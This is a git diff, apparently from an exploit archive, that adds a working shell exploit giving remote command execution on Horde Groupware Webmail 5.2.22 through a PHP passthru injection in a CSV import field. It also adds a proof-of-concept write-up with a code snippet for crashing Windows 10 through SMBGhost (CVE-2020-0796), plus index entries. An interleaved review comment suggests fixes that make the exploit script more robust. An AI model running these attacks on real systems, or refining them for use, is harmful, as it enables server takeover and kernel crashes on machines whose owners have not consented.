diff --git a/exploits/php/webapps/48215.sh b/exploits/php/webapps/48215.sh
new file mode 100755
index 000000000..4f6f24f5f
--- /dev/null
+++ b/exploits/php/webapps/48215.sh
@@ -0,0 +1,41 @@
+#!/bin/sh
+
+if [ "$#" -ne 4 ]; then
+ echo '[!] Usage: ' 1>&2
+ exit 1
+fi
+
+BASE="$1"
+USERNAME="$2"
+PASSWORD="$3"
+COMMAND="$4"
+
+JAR="$(mktemp)"
+trap 'rm -f "$JAR"' EXIT
+
+echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2
+curl -si -c "$JAR" "$BASE/login.php" \
+ -d 'login_post=1' \
+ -d "horde_user=$USERNAME" \
+ -d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \
+ echo '[!] Cannot log in' 1>&2
+
+echo "[+] Uploading dummy file" 1>&2
+echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \
+ -F 'actionID=11' \
+ -F 'import_step=1' \
+ -F 'import_format=csv' \
+ -F 'notepad_target=x' \
+ -F 'import_file=@-;filename=x' \
+ -so /dev/null
+
+echo "[+] Running command" 1>&2
+BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)"
+curl -b "$JAR" "$BASE/mnemo/data.php" \
+ -d 'actionID=3' \
+ -d 'import_step=2' \
+ -d 'import_format=csv' \
+ -d 'header=1' \
+ -d 'fields=1' \
+ -d 'sep=x' \
+ --data-urlencode "quote=).passthru(base64_decode(\"$BASE64_COMMAND\")).die();}//\\"
\ No newline at end of file
diff --git a/exploits/windows/dos/48216.md b/exploits/windows/dos/48216.md
new file mode 100644
index 000000000..5e1d56281
--- /dev/null
+++ b/exploits/windows/dos/48216.md
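Review bot: The login check on the `curl ... | grep -q 'Location: /services/portal/'` pipeline only prints `[!] Cannot log in` and then falls through, so a failed login still sends the two following requests with an empty cookie jar; that branch should abort, `|| { echo '[!] Cannot log in' 1>&2; exit 1; }`. The usage branch prints the bare string `[!] Usage: ` and never names the four positional parameters the script reads into BASE, USERNAME, PASSWORD and COMMAND, so I would make it `echo "Usage: $0 <base-url> <username> <password> <command>" 1>&2`. The `[+] Logging in as $USERNAME:$PASSWORD` message writes the password to stderr, where it ends up in terminal scrollback and any captured log; printing only `$USERNAME` there is sufficient.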
@@ -0,0 +1,29 @@
+# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip
+
+## Usage
+
+`./CVE-2020-0796.py servername`
+
+This script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.
+
+This contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.
+
+The compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash.
+
+```python
+ def _compress(self, b_data, session):
+ header = SMB2CompressionTransformHeader()
+ header['original_size'] = len(b_data)
+ header['offset'] = 4294967295
+ header['data'] = smbprotocol.lznt1.compress(b_data)
+```
+
+## About
+
+CVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression cabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271).
+
+Once a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. 
To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.
+
+CVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7ebee40b7..1b539486e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6685,6 +6685,7 @@ id,file,description,date,author,type,platform,port
 48133,exploits/windows/dos/48133.py,"aSc TimeTables 2020.11.4 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
 48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows,
 48137,exploits/windows/dos/48137.py,"Core FTP LE 2.2 - Denial of Service (PoC)",2020-02-26,"Ismael Nava",dos,windows,
+48216,exploits/windows/dos/48216.md,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)",2020-03-14,eerykitty,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42469,3 +42470,4 @@ id,file,description,date,author,type,platform,port
 48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
 48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,
 48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,
+48215,exploits/php/webapps/48215.sh,"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution",2020-03-10,"Andrea Cardaci",webapps,php,